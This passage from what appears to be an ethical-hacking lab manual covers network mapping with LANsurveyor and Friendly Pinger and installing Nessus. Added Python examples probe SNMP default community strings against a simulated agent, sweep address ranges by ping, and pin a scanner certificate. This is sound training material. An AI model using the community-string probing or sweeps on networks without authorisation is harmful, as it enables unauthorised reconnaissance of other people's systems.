Note: LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember that switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.
FIGURE 8.5: Create A New Network Map window. Network Parameters: Begin Address 10.0.0.1, End Address 10.0.0.254 (following router hops requires SNMP router access). Routers, Switches and Other SNMP Device Discovery: SNMPv1 devices and SNMPv2c devices are tried with the community strings "public, private"; SNMPv3 devices have their own options. Other IP Service Discovery: LANsurveyor Responders (with a Responder password), Active Directory DCs, ICMP ping, NetBIOS, SIP. A Mapping Speed slider (Faster/Slower) and Configuration Management (load/save discovery configuration) complete the dialog.

The two community strings LANsurveyor tries by default, "public" (read-only) and "private" (read-write), are the factory defaults on a great many devices. SNMPv1 and v2c send the community string in clear text in every packet, so a node that answers "public" here will answer anyone else on the segment too, and a node that answers "private" can be reconfigured by them; this is why the next lab's scenario treats default community strings as an attack vector.

6. The mapping process for the entered IP address range is displayed as shown in the following figure

FIGURE 8.6: Mapping Progress window: Searching for IP nodes, Hop 0: 10.0.0.1 - 10.0.0.254, Last Node Contacted: WIN-D39MR5HL9E4, with counters for SNMP Sends, SNMP Receipts, ICMP Ping Sends, ICMP Receipts, Subnets Mapped, Nodes Mapped, Routers Mapped and Switches Mapped.

7. LANsurveyor displays the map of your network

Note: LANsurveyor's network discovery discovers all network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address.

Note: LANsurveyor is capable of discovering and mapping multiple VLANs on Layer 2, for example to map a switch connecting multiple, non-consecutive VLANs.
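What the SNMPv1/v2c probes in FIGURE 8.5 look like on the wire, as an added Python example that is not part of the lab manual, of LANsurveyor or of any SNMP library: it BER-encodes an SNMPv1 GetRequest for sysDescr.0 with a given community string, decodes the GetResponse, and tries "public" and "private" against an agent the way a mapper does for every discovered node. The agent here is constructed in code (its accepted community, its sysDescr text and the request ID are invented for illustration); nothing is sent on UDP port 161.

```python
"""SNMPv1 GetRequest/GetResponse at the byte level: the BER encoding a mapper
uses when it tries the community strings 'public' and 'private' against each
node. Added example; the agent is constructed here, nothing goes over UDP/161."""
import struct

TAG_INT, TAG_OCTETS, TAG_NULL, TAG_OID, TAG_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
TAG_GET_REQUEST, TAG_GET_RESPONSE = 0xA0, 0xA2
SYS_DESCR = "1.3.6.1.2.1.1.1.0"          # sysDescr.0 from MIB-II


def ber_length(n):
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw


def tlv(tag, body):
    return bytes([tag]) + ber_length(len(body)) + body


def ber_int(value):
    # minimal two's-complement encoding
    return tlv(TAG_INT, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))


def ber_oid(oid):
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:                  # base-128, high bit = 'more bytes follow'
        group = [arc & 0x7F]
        arc >>= 7
        while arc:
            group.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(group)
    return tlv(TAG_OID, bytes(out))


def decode_tlv(data, pos=0):
    """Return (tag, body, next_pos) for the element starting at pos."""
    tag, length = data[pos], data[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    return tag, data[pos:pos + length], pos + length


def decode_children(body):
    items, pos = [], 0
    while pos < len(body):
        tag, child, pos = decode_tlv(body, pos)
        items.append((tag, child))
    return items


def decode_oid(body):
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def build_message(pdu_tag, community, request_id, varbinds):
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, PDU }."""
    binds = b"".join(tlv(TAG_SEQ, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(TAG_SEQ, binds))
    return tlv(TAG_SEQ, ber_int(0) + tlv(TAG_OCTETS, community.encode()) + pdu)


def build_get_request(community, oid, request_id=1):
    return build_message(TAG_GET_REQUEST, community, request_id, [(oid, tlv(TAG_NULL, b""))])


def parse_message(data):
    """Decode either direction into: community, pdu tag, request id, varbinds."""
    _, msg, _ = decode_tlv(data)
    (_, _version), (_, community), (pdu_tag, pdu) = decode_children(msg)
    (_, req_id), (_, _err), (_, _idx), (_, binds) = decode_children(pdu)
    varbinds = []
    for _, bind in decode_children(binds):
        (_, oid), (value_tag, value) = decode_children(bind)
        varbinds.append((decode_oid(oid), value_tag, value))
    return {"community": community.decode(), "pdu": pdu_tag,
            "request_id": int.from_bytes(req_id, "big", signed=True), "varbinds": varbinds}


def fake_agent(request_bytes, accepted_community="public", sys_descr=b"Linux lab-router 5.10"):
    """Constructed SNMPv1 agent: answers sysDescr.0 only for the right community,
    like a real agent that silently drops requests with a wrong community string."""
    req = parse_message(request_bytes)
    if req["community"] != accepted_community or req["pdu"] != TAG_GET_REQUEST:
        return None
    return build_message(TAG_GET_RESPONSE, req["community"], req["request_id"],
                         [(SYS_DESCR, tlv(TAG_OCTETS, sys_descr))])


def probe_community(community, agent=fake_agent):
    """What a mapper does per node: try a community string, return sysDescr or None."""
    reply = agent(build_get_request(community, SYS_DESCR, request_id=42))
    if reply is None:
        return None
    oid, tag, value = parse_message(reply)["varbinds"][0]
    return value.decode() if tag == TAG_OCTETS and oid == SYS_DESCR else None


if __name__ == "__main__":
    for community in ("public", "private"):
        print(community, "->", probe_community(community))
```

Against a real device you would send the bytes from `build_get_request` over UDP to port 161 and feed the datagram that comes back to `parse_message`; the request ID is what lets you match a reply to its request when several are in flight. Note that a wrong community produces no reply at all, so a mapper cannot distinguish "wrong string" from "no SNMP agent" without a timeout, which is why every extra community string tried per node slows the whole discovery down.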
FIGURE 8.7: Resulting network diagram. The map shows the 10.0.0.0/24 segment with four nodes, among them WIN-D39MR5HL9E4 and the other Windows hosts found in the previous lab; the Overview pane lists Network Segments (1), IP Addresses (4), Domain Names (4) and Node Names (4), and the legend covers IP Routers, LANsurveyor Responder Nodes, SNMP Nodes, SNMP Switches, Hubs, SIP (VoIP) Nodes, Layer 2 Nodes, Active Directory DCs and Groups.

Lab Analysis

Document all the IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during the lab.

Tool/Utility: LANSurveyor
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1 - 10.0.0.254
IP Node Details:
■ SNMP Sends - 62
■ ICMP Ping Sends - 31
■ ICMP Receipts - 4
■ Nodes Mapped - 4
Network Segment Details:
■ IP Addresses - 4
■ Domain Names - 4
■ Node Names - 4

Note: LANsurveyor Responder clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.
Talk to your instructor if you have questions related to this lab.

Questions
1. Does LANSurveyor map every IP address to its corresponding switch or hub port?
2. Can nodes connected via wireless access points be detected and mapped?

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Mapping a Network Using Friendly Pinger

Friendly Pinger is a user-friendly application for network administration, monitoring, and inventory.

Lab Scenario

In the previous lab, you found the SNMP, ICMP Ping, Nodes Mapped, etc. details using the tool LANSurveyor. If an attacker is able to get hold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces on a router using the default read-only community string "public" and disable them using the read-write community string. SNMP MIBs include information about the identity of the agent's host, and an attacker can take advantage of this information to initiate an attack.

Using the ICMP reconnaissance technique an attacker can also determine the topology of the target network. Attackers could use either the ICMP "Time exceeded" or "Destination unreachable" messages. Forged copies of both of these ICMP messages can cause a host to immediately drop a TCP connection.

As an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks, and block attacks by deploying firewalls on a network to filter unwanted traffic. You should be able to block SNMP traffic at border routers or firewalls, so that agents cannot be queried from outside the network.

In this lab, you will learn to map a network using the tool Friendly Pinger.

Lab Objectives

The objective of this lab is to help students discover and diagram network topology and map a discovered network.

In this lab, you need to:
■ Discover a network using discovery techniques
■ Diagram the network topology
■ Detect new devices and modifications made in network topology
■ Perform inventory management for hardware and software assets
Lab Environment

To perform the lab, you need:
■ Friendly Pinger, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger
■ You can also download the latest version of Friendly Pinger from http://www.kilievich.com/fpinger/download.htm
■ If you decide to download the latest version, the screenshots shown in this lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Friendly Pinger tool

Lab Duration
Time: 10 Minutes

Overview of Network Mapping

Network mapping is the study of the physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems running on networks. This technique detects new devices and modifications made in network topology, and you can use it to perform inventory management for hardware and software assets.

Friendly Pinger performs the following to map the network:
■ Monitors network device availability
■ Notifies you if any server wakes up or goes down
■ Pings all devices in parallel at once
■ Audits hardware and software components installed on the computers over the network

Lab Tasks

TASK 1: Draw Network Map

1. Install Friendly Pinger on your Windows Server 2012
2. Follow the wizard-driven installation steps and install Friendly Pinger
3. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 9.1: Windows Server 2012 - Desktop view
4. Click the Friendly Pinger app to open the Friendly Pinger window.
FIGURE 9.2: Windows Server 2012 - Apps
5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration.
6. Click No.
FIGURE 9.3: FPinger Main Window
You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods. Friendly Pinger displays the IP address of your computer and offers an exemplary range of IP addresses for scanning. To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". A TraceRoute dialog window appears in the lower part of the map; as the intermediate addresses are determined, they are listed in this window and the route is drawn as red arrows on the map.
7. Select File from the menu bar and select the Wizard option.
FIGURE 9.4: FPinger Starting Wizard
8. To create the initial mapping of the network, type a range of IP addresses in the specified field as shown in the following figure, and click Next. The wizard shows the local IP address (10.0.0.7 in the figure) and builds the initial map by querying the DNS server about the addresses in the range. You can specify a narrower range to speed up this operation, for example 10.129-135.1-5.1-10. The Timeout value (1000 in the figure) allows a more thorough search; with a shorter timeout you can miss some addresses.
FIGURE 9.5: FPinger Initializing IP address range
9. The wizard then starts scanning the IP addresses in the network and lists them.
10. Click Next.
Scanning allows you to learn a lot about your network. Thanks to its unique technologies, you can quickly find all the HTTP, FTP, e-mail and other services present on your network.
The map occupies most of the window. Right-click it, and in the context menu that appears select "Add" and then "Workstation". A Device configuration dialog window appears; specify the requested parameters: device name, address, description, and picture. The device is displayed as an animated picture if it responds to ping, and as a black-and-white picture if it does not.
FIGURE 9.6: FPinger Scanning of Addresses completed
The wizard reports "The inquiry is completed. 4 devices found." and lists WIN-MSSELCK4K41 (10.0.0.2), Windows8 (10.0.0.3), WIN-LXQN3WR3R9M (10.0.0.5), and WIN-D39MR5HL9E4 (10.0.0.7). Remove the tick from any device that you do not want to add to the map.
11. Keep the default options in the Wizard selection window (Devices type: Workstation; Address: Use DNS-name, Remove DNS suffix; Addition: Add devices to the current map) and click Next.
FIGURE 9.7: FPinger selecting the Devices type
Press CTRL+I to get more information about the created map. You will see your name as the map author in the dialog window that appears.
Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you specify a hostname rather than an address, the hostname is resolved to an IP address using your default DNS server; in this case you are vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.
12. The client area then displays the network map in the FPinger window.
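The wizard steps above do three things that are worth seeing in code: expand a range written in Friendly Pinger's per-octet notation (10.129-135.1-5.1-10), ping every candidate in parallel, and record a name for each responder, which the note on ping points out depends on whatever the DNS server answers. The block below is an added example, not Friendly Pinger's code or the lab's; it also accepts the plain "10.0.0.1-10.0.0.20" form used in the Lab Analysis, and it adds the check the DNS note implies: before trusting a mapped name, resolve it forward and reverse and compare with the address on the map. The device names and addresses in the `__main__` section are the ones the wizard found in the lab; `ping_probe` assumes the Windows or Linux `ping` flag set, and the `resolve`/`reverse` parameters exist so the check can be run against any resolver.

```python
"""Range expansion, parallel availability sweep and name/address cross-check
for a network inventory. Added example, not Friendly Pinger's own code."""
import ipaddress
import platform
import re
import socket
import subprocess
from concurrent.futures import ThreadPoolExecutor

_FULL_RANGE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)-(\d+\.\d+\.\d+\.\d+)$")
_OCTET = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")


def expand_range(spec):
    """Expand '10.0.0.1-20', '10.129-135.1-5.1-10' or '10.0.0.250-10.0.1.5'
    into a list of dotted-quad strings."""
    spec = spec.replace(" ", "")
    m = _FULL_RANGE.match(spec)
    if m:  # two complete addresses: walk the integer range between them
        lo = ipaddress.IPv4Address(m.group(1))
        hi = ipaddress.IPv4Address(m.group(2))
        if lo > hi:
            raise ValueError(f"range start after end: {spec}")
        return [str(ipaddress.IPv4Address(n)) for n in range(int(lo), int(hi) + 1)]
    parts = spec.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four octets: {spec}")
    choices = []
    for part in parts:  # each octet may be a value or a lo-hi span
        m = _OCTET.match(part)
        if not m:
            raise ValueError(f"bad octet spec: {part}")
        lo = int(m.group(1))
        hi = int(m.group(2)) if m.group(2) else lo
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"octet out of range: {part}")
        choices.append(range(lo, hi + 1))
    return [f"{a}.{b}.{c}.{d}" for a in choices[0] for b in choices[1]
            for c in choices[2] for d in choices[3]]


def ping_probe(host, timeout=1.0):
    """One ICMP echo via the OS ping command (Windows or Linux flag set assumed;
    other platforms may need different flags). True when a reply came back."""
    if platform.system() == "Windows":
        cmd = ["ping", "-n", "1", "-w", str(int(timeout * 1000)), host]
    else:
        cmd = ["ping", "-c", "1", "-W", str(max(1, int(timeout))), host]
    try:
        result = subprocess.run(cmd, stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL, timeout=timeout + 2)
    except (OSError, subprocess.TimeoutExpired):
        return False
    return result.returncode == 0


def sweep(hosts, probe=ping_probe, workers=32):
    """Probe all hosts in parallel (as Friendly Pinger does) and return the
    responsive ones in address order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        alive = [h for h, up in zip(hosts, pool.map(probe, hosts)) if up]
    return sorted(alive, key=ipaddress.IPv4Address)


def _reverse(address):
    return socket.gethostbyaddr(address)[0]


def check_name(name, address, resolve=socket.gethostbyname, reverse=_reverse):
    """Cross-check a mapped device name against its recorded address, so a
    stale or tampered DNS entry is reported instead of trusted silently."""
    try:
        forward = resolve(name)
    except (OSError, LookupError):
        return "unresolvable"
    if forward != address:
        return "forward-mismatch"
    try:
        rname = reverse(address)
    except (OSError, LookupError):
        return "no-reverse"
    if rname.split(".")[0].lower() != name.split(".")[0].lower():
        return "reverse-mismatch"
    return "ok"


if __name__ == "__main__":
    # Name -> address pairs as the wizard recorded them in the lab.
    lab_map = {"WIN-MSSELCK4K41": "10.0.0.2", "Windows8": "10.0.0.3",
               "WIN-LXQN3WR3R9M": "10.0.0.5", "WIN-D39MR5HL9E4": "10.0.0.7"}
    for host in sweep(expand_range("10.0.0.1-20")):
        print("alive:", host)
    for name, addr in lab_map.items():
        print(name, addr, check_name(name, addr))
```

A "forward-mismatch" or "reverse-mismatch" result on a device you added by DNS name is exactly the invalid-DNS-entry case the note warns about: the map now points at whatever the resolver said, not necessarily at the machine you scanned.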
FIGURE 9.8: FPinger Client area with Network architecture
13. To scan a selected computer in the network, select the computer, select the Scan tab from the menu bar, and click Scan.
FIGURE 9.9: FPinger Scanning the computers in the Network
14. The scanned details are displayed in the Scanning wizard.
If you want to ping inside the network, behind the firewall, there will be no problems. If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through; your network administrator should do it for you. The same applies to the proxy server.
You may download the latest release from http://www.kilievich.com/fpinger.
Select File | Options and configure Friendly Pinger to your taste.
FIGURE 9.10: FPinger Scanned results
In the figure, the scan found the HTTP service on WIN-MSSELCK4K41 (http://WIN-MSSELCK4K41) and on WIN-D39MR5HL9E4 (http://WIN-D39MR5HL9E4).
Double-click a device to open it in Explorer.
15. Click the Inventory tab from the menu bar to view the configuration details of the selected computer.
FIGURE 9.11: FPinger Inventory tab
16. The General tab of the Inventory wizard shows the computer name and installed operating system.
Friendly Pinger audits the software and hardware components installed on the computers over the network, and tracks user access and files opened on your computer via the network.
FIGURE 9.12: FPinger Inventory wizard General tab
The General tab in the figure shows: Host name WIN-D39MR5HL9E4; User name Administrator; Windows name Windows Server 2012 Release Candidate Datacenter; Collection time 8/22/2012 11:22:34 AM.
17. The Misc tab shows the network IP addresses, MAC addresses, file system, and size of the disks.
FIGURE 9.13: FPinger Inventory wizard Misc tab
The Misc tab in the figure shows: IP address 10.0.0.7, MAC address D4-BE-D9-C3-CE-2D; total space 465.42 Gb, free space 382.12 Gb; display settings 1366x768, 60 Hz, True Color (32 bit); and the disks:
Disk   Type    Free, Gb   Size, Gb   Used, %   File System
C      Fixed   15.73      97.31      84        NTFS
D      Fixed   96.10      97.66      2         NTFS
18. The Hardware tab shows the hardware component details of your networked computers.
Friendly Pinger also supports assignment of external commands (like telnet, tracert, net.exe) to devices, and searching for HTTP, FTP, e-mail and other network services. The "Create Setup" function creates a lite freeware version with your maps and settings.
FIGURE 9.14: FPinger Inventory wizard Hardware tab
The Hardware tab for WIN-D39MR5HL9E4 lists the processor (4x Intel Pentium III Xeon 3093), memory (4096 Mb), BIOS (AT/AT COMPATIBLE, DELL, 02/09/12), monitor (Generic PnP Monitor), display adapter (Intel(R) HD Graphics Family), disk drive (ST3500413AS), network adapter (Realtek PCIe GBE Family Controller), and SCSI and RAID controllers (Microsoft Storage Spaces Controller).
19. The Software tab shows the installed software on the computers.
FIGURE 9.15: FPinger Inventory wizard Software tab
The Software tab lists each installed program with its name, version, developer, and homepage (in the figure, for example, Adobe Reader X (10.1.3), eMailTrackerPro, EPSON USB Display, Friendly Pinger, Intel(R) Processor Graphics, Java(TM) 6 Update 17, Microsoft .NET Framework 4 Multi-Targeting Pack, Microsoft Application Error Reporting, and several Microsoft Office 2010 components).

Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Friendly Pinger also provides visualization of your computer network as a beautiful animated screen.
Tool/Utility: Friendly Pinger
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1-10.0.0.20
Found IP addresses:
■ 10.0.0.2
■ 10.0.0.3
■ 10.0.0.5
■ 10.0.0.7
Details collected for 10.0.0.7:
■ Computer name
■ Operating system
■ IP address
■ MAC address
■ File system
■ Size of disk
■ Hardware information
■ Software information

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Does FPinger support proxy servers and firewalls?
2. Examine the programming language used in FPinger.

Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Scanning a Network Using the Nessus Tool

Nessus allows you to remotely audit a network and determine if it has been broken into or misused in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.

Lab Scenario
In the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notifications, ping information, track user access via the network, view graphical traceroutes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get traceroute information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall. If an attacker gains physical access to a switch or other network device, he or she will be able to successfully install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. It is also very important that you use some methodology to detect such rogue devices on the network.

As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.

Lab Objectives
This lab will give you experience in scanning the network for vulnerabilities and show you how to use Nessus. It will teach you how to:
■ Use the Nessus tool
■ Scan the network for vulnerabilities
Lab Environment
To carry out the lab, you need:
■ Nessus, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
■ You can also download the latest version of Nessus from the link http://www.tenable.com/products/nessus/nessus-download-agreement
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Nessus tool

Lab Duration
Time: 20 Minutes

Overview of the Nessus Tool
Nessus helps students to learn, understand, and determine the vulnerabilities and weaknesses of a system and network in order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities.

Lab Tasks
TASK 1: Nessus Installation
1. To install Nessus, navigate to D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus.
2. Double-click the Nessus-5.0.1-x86_64.msi file.
3. The Open File - Security Warning window appears; click Run.
FIGURE 10.1: Open File - Security Warning
Nessus is public domain software released under the GPL.
Nessus is designed to automate the testing and discovery of known security problems.
4. The Nessus - InstallShield Wizard appears. During the installation process, the wizard prompts you for some basic information. Follow the instructions and click Next.
FIGURE 10.2: The Nessus installation window
5. Before you begin the installation, you must agree to the license agreement as shown in the following figure.
6. Select the radio button to accept the license agreement and click Next.
FIGURE 10.3: The Nessus InstallShield Wizard
7. Select a destination folder and click Next.
The updated Nessus security checks database can be retrieved with the command nessus-update-plugins.
Nessus has the ability to test SSLized services such as https, smtps, imaps and more.
The Nessus security scanner includes NASL (Nessus Attack Scripting Language).
FIGURE 10.4: The Nessus InstallShield Wizard (destination folder; the default is C:\Program Files\Tenable\Nessus\)
8. The wizard prompts for the Setup Type. With the Complete option, all program features will be installed. Check Complete and click Next.
FIGURE 10.5: The Nessus InstallShield Wizard for Setup Type
9. The Nessus wizard will prompt you to confirm the installation. Click Install.
Nessus gives you the choice of performing a regular, non-destructive security audit on a routine basis.
Nessus probes a range of addresses on a network to determine which hosts are alive.
FIGURE 10.6: Nessus InstallShield Wizard (ready to install)
Nessus probes the network services on each host to obtain banners that contain software and OS version information.
10. Once the installation is complete, click Finish.
FIGURE 10.7: Nessus InstallShield Wizard completed
The path of the Nessus home directory for Windows is \Program Files\Tenable\Nessus.
Nessus Major Directories
■ The major directories of Nessus are shown in the following table.
Nessus Home Directory (Windows): \Program Files\Tenable\Nessus

Nessus Sub-Directory             Purpose
conf                             Configuration files
data                             Stylesheet templates
nessus\plugins                   Nessus plugins
nessus\users\<username>\kbs      User knowledgebase saved on disk
nessus\logs                      Nessus log files
TABLE 10.1: Nessus Major Directories

11. After installation, Nessus opens in your default browser.
12. The Welcome to Nessus screen appears; click the here link to connect via SSL.
FIGURE 10.8: Nessus SSL certification
The welcome page reads: "Please connect via SSL by clicking here. You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information."
13. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.9: Internet Explorer Security Alert
14. Click the Continue to this website (not recommended) link to continue.
During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required. The Nessus Server Manager used in Nessus 4 has been deprecated.
FIGURE 10.10: Internet Explorer website's security certificate
Internet Explorer warns that the security certificate presented by this website was not issued by a trusted certificate authority and was issued for a different website's address, and that security certificate problems may indicate an attempt to fool you or intercept any data you send to the server.
15. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.11: Internet Explorer Security Alert
16. The Thank you for installing Nessus screen appears. Click the Get Started > button.
Due to the technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted by browsers. To avoid the warning, a custom certificate specific to your organization must be used.
FIGURE 10.11: Nessus Getting Started
17. In Initial Account Setup, enter the credentials given at the time of registration and click Next >.
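Steps 13 to 15 click through the browser's certificate warning, and the note explains why the warning appears: the scanner's certificate is self-signed, so no browser will trust it by itself. Until an organization-issued certificate is installed, the check a practitioner actually wants is a pin, that is, comparing the certificate the scanner presents now with the fingerprint recorded at installation, so that the admin credentials entered in step 17 are not handed to whatever happens to answer on that address. The following is an added example, not Nessus code or part of the lab: the port 8834 default is an assumption about the Nessus web interface, the `fetch` parameter exists only so the comparison can be exercised without a live scanner, and the bytes in the test stand in for a DER certificate.

```python
"""Pin check for a scanner's HTTPS interface: instead of accepting the
browser's certificate warning, compare the certificate the server presents
with the SHA-256 fingerprint recorded when the scanner was installed.
Added example, not Nessus code; port 8834 is an assumed default."""
import hashlib
import socket
import ssl

NESSUS_PORT = 8834  # assumed default port of the Nessus web interface


def sha256_fingerprint(der_bytes):
    """Colon-separated upper-case SHA-256 digest, the form certificate viewers show."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def _normalize(fingerprint):
    """Accept the pin with or without colons/spaces and in either case."""
    return fingerprint.replace(":", "").replace(" ", "").lower()


def pin_matches(der_bytes, expected_fingerprint):
    """True when the certificate bytes hash to the recorded fingerprint."""
    return _normalize(sha256_fingerprint(der_bytes)) == _normalize(expected_fingerprint)


def fetch_peer_cert(host, port=NESSUS_PORT, timeout=5.0):
    """Return the server's leaf certificate in DER form. Chain validation is
    switched off on purpose: the self-signed scanner certificate would fail
    it, and trust is decided by the pin comparison instead."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def check_scanner(host, expected_fingerprint, port=NESSUS_PORT, fetch=fetch_peer_cert):
    """True when the certificate presented by host:port matches the recorded pin."""
    return pin_matches(fetch(host, port), expected_fingerprint)


if __name__ == "__main__":
    import sys
    # usage: python pin_check.py <scanner-host> <recorded-sha256-fingerprint>
    host, pin = sys.argv[1], sys.argv[2]
    print("pin ok" if check_scanner(host, pin) else "PIN MISMATCH: do not log in")
```

Record the fingerprint once, from the console of the freshly installed scanner, and treat any later mismatch as a reason to stop rather than to click "Continue"; once the organization's own certificate is installed, the browser's normal chain validation replaces this check.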
FIGURE 10.12: Nessus Initial Account Setup
The Initial Account Setup page explains: "First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/delete users, stop ongoing scans, and change the scanner configuration. Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the remote host. Therefore, it should be noted that the admin user has the same privileges as the 'root' (or administrator) user on the remote host." The login used in the figure is admin.
18. In Plugin Feed Registration, you need to enter the activation code. To obtain an activation code, click the http://www.nessus.org/register/ link.
19. Click the Using Nessus at Home icon in Obtain an Activation Code.
FIGURE 10.13: Nessus Obtaining Activation Code
If you are using the Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it will normally not do without a valid Activation Code and plugins.
20. In Nessus for Home, accept the agreement by clicking the Agree button as shown in the following figure.
FIGURE 10.14: Nessus Subscription Agreement
21. Fill in the Register a HomeFeed section to obtain an activation code and click Register.
FIGURE 10.15: Nessus Registering HomeFeed
The registration form notes that, to stay up to date with the Nessus plugins, you must enter an email address to which an activation code will be sent; the address is not shared with any third party.
22. The Thank You for Registering window appears for Tenable Nessus HomeFeed.
If you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive.
After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.org or plugins-customers.nessus.org.
FIGURE 10.16: Nessus Registration Completed
The page reads: "Thank you for registering your Tenable Nessus HomeFeed. An email containing your activation code has just been sent to you at the email address you provided. Please note that the Tenable Nessus HomeFeed is available for home use only. If you want to use Nessus at your place of business, you must purchase the Nessus ProfessionalFeed. Alternatively, you may purchase a subscription to the Nessus Perimeter Service and scan in the cloud; the Nessus Perimeter Service does not require any software download."
23. Now log in to your email for the activation code provided at the time of registration, as shown in the following figure.
FIGURE 10.17: Nessus Registration mail
24. Now enter the activation code received at your email ID and click Next.
FIGURE 10.18: Nessus Applying Activation Code
The Plugin Feed Registration page explains: "As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed". You can do so by visiting http://www.nessus.org/register/ to obtain an Activation Code. To use Nessus at your workplace, purchase a commercial ProfessionalFeed. To use Nessus in a non-commercial home environment, you can get a HomeFeed for free. Tenable SecurityCenter users: enter 'SecurityCenter' in the field below. To perform offline plugin updates, enter 'offline' in the field below." Enter your Activation Code in the field provided (Optional Proxy Settings are available below it).
Once the plugins have been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start.
25. The Registering window appears as shown in the following screenshot.
FIGURE 10.19: Nessus Registering Activation Code
26. After successful registration ("Successfully registered the scanner with Tenable. Successfully created the user."), click Next: Download plugins > to download the Nessus plugins.
FIGURE 10.20: Nessus Downloading Plugins
Nessus server configuration is managed via the GUI; the nessusd.conf file is deprecated. In addition, proxy settings, subscription feed registration, and offline updates are managed via the GUI.
27. Nessus will start fetching the plugins and install them; it takes some time to install the plugins and initialize.
FIGURE 10.21: Nessus fetching the newest plugin set
28. The Nessus Log In page appears. Enter the Username and Password given at the time of registration and click Log In.
FIGURE 10.22: The Nessus Log In screen

29. The Nessus HomeFeed window appears. Click OK.

TASK 2: Network Scan Vulnerabilities

Note: For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.

FIGURE 10.23: Nessus HomeFeed subscription

